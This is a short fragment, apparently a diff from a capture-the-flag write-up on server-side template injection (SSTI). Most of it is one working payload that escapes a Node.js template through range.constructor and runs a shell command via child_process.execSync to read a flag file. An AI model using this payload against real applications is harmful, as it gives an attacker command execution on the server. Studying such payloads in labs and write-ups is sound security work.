Post

 {{range.constructor("return global.process.mainModule.require('child_process').execSync('tail flag.txt')")()}}

-We created the note:
+We create the note:

 SSTI